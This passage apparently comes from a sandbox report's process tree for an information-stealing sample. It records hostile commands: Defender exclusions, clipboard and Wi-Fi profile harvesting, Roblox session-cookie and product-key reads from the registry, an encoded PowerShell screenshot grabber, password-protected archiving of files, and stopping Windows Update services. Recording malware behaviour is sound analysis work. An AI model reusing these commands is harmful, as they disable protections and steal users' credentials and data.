                                                                                                                                                    PID:4812
                                                                                                                                                    • C:\Windows\system32\mshta.exe
                                                                                                                                                      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Plese use temp', 0, 'Not supported', 48+16);close()"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5000
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‌‍ .scr'"
                                                                                                                                                      8⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2416
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​‌‍ .scr'
                                                                                                                                                        9⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:540
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                      8⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:2864
                                                                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                                                                        tasklist /FO LIST
                                                                                                                                                        9⤵
                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:4416
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:3472
                                                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                                                          tasklist /FO LIST
                                                                                                                                                          9⤵
                                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4948
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:3100
                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                            9⤵
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:1520
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                          8⤵
                                                                                                                                                          • Clipboard Data
                                                                                                                                                          PID:1768
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell Get-Clipboard
                                                                                                                                                            9⤵
                                                                                                                                                            • Clipboard Data
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:3504
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                          8⤵
                                                                                                                                                            PID:880
                                                                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                                                                              tasklist /FO LIST
                                                                                                                                                              9⤵
                                                                                                                                                              • Enumerates processes with tasklist
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:4864
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                            8⤵
                                                                                                                                                              PID:4152
                                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                                tree /A /F
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:1044
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                8⤵
                                                                                                                                                                • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                PID:2852
                                                                                                                                                                • C:\Windows\system32\netsh.exe
                                                                                                                                                                  netsh wlan show profile
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                  PID:3632
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3292
                                                                                                                                                                  • C:\Windows\system32\systeminfo.exe
                                                                                                                                                                    systeminfo
                                                                                                                                                                    9⤵
                                                                                                                                                                    • Gathers system information
                                                                                                                                                                    PID:3092
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                  8⤵
                                                                                                                                                                    PID:3208
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2480
                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tmi1jvz\4tmi1jvz.cmdline"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:5376
                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14CB.tmp" "c:\Users\Admin\AppData\Local\Temp\4tmi1jvz\CSC85220ACE237C4BA6BA245FC99E157FD.TMP"
                                                                                                                                                                            11⤵
                                                                                                                                                                              PID:6784
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:2432
                                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                                            tree /A /F
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:5596
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:5512
                                                                                                                                                                              • C:\Windows\system32\tree.com
                                                                                                                                                                                tree /A /F
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:5432
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5404
                                                                                                                                                                                  • C:\Windows\system32\tree.com
                                                                                                                                                                                    tree /A /F
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:3032
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:1848
                                                                                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                                                                                        tree /A /F
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:6724
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:6636
                                                                                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                                                                                            tree /A /F
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:5144
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6988
                                                                                                                                                                                              • C:\Windows\system32\getmac.exe
                                                                                                                                                                                                getmac
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:7060
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:7276
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                    PID:8500
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:8156
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                      PID:8076
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\j9VIK.zip" *"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:8604
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"amnesia" "C:\Users\Admin\AppData\Local\Temp\j9VIK.zip" *
                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:8660
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:9076
                                                                                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                          wmic os get Caption
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                          PID:4824
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:6496
                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:6484
                                                                                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                              wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:6436
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:2784
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:8
                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 2784 -s 316
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                  PID:3672
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                    PID:6984
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                    PID:7088
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:7796
                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                      PID:7808
                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                                                                      PID:1944
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:7700
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                        PID:7712
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                          PID:7744
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                            PID:7932
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:8704
                                                                                                                                                                                                              • C:\Windows\System32\sc.exe
                                                                                                                                                                                                                sc stop UsoSvc
